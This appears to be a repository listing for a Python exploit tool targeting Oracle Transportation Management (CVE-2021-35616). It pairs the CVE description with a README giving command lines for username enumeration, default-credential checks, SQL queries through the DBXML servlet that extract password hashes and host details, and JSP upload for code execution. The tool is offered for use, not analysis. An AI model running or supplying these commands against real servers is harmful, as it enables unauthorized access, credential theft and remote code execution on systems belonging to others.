CVE-2021-35616 PoC — Oracle Transportation Management Security Vulnerability

Source
Associated Vulnerability
Title: Oracle Transportation Management Security Vulnerability (CVE-2021-35616)
Description: Vulnerability in the Oracle Transportation Management product of Oracle Supply Chain (component: UI Infrastructure). The supported version that is affected is 6.4.3. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Transportation Management. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Transportation Management accessible data as well as unauthorized read access to a subset of Oracle Transportation Management accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N).
Description
Python tool for exploiting CVE-2021-35616 
Readme
# OracleOTM
Python tool for exploiting CVE-2021-35616 


The script works in modules, which I implemented in the following order:

►	Username enumeration

►	Search for default credentials

►	Run an SQL query using DBXML servlet

►	Full exploitation and JSP execution

The syntax of the script is as follows: 

.\OracleOTM.py {module} {hosts TXT file} {additional parameters}



Username enumeration: .\OracleOTM.py enum {hosts TXT file} -u users.txt

Search for default credentials: .\OracleOTM.py default {hosts TXT file}

Run an SQL query using DBXML servlet: .\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q "select 1 from dual"


I also prepared some predefined queries that I found useful; you can access them directly, as follows:

.\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q os 

    OS – Extract the server’s OS 

    Osuser – Extract the OS user running the DB

    Hostname – DB server host name 

    Hostip – DB server IP address 

    Passwords – Extracts the OTM users and their hashed passwords

    Oraversion – The DB version

    Dbusershash – The DB users’ password hashes

    Dbfileslocation – The location of the DB files in the OS

Full exploitation and JSP execution: .\OracleOTM.py exploit {hosts TXT file} -lu EBS.ADMIN -lp Aa123123 -pf "C:\Users\user\Desktop\Header_notepad.jspx"
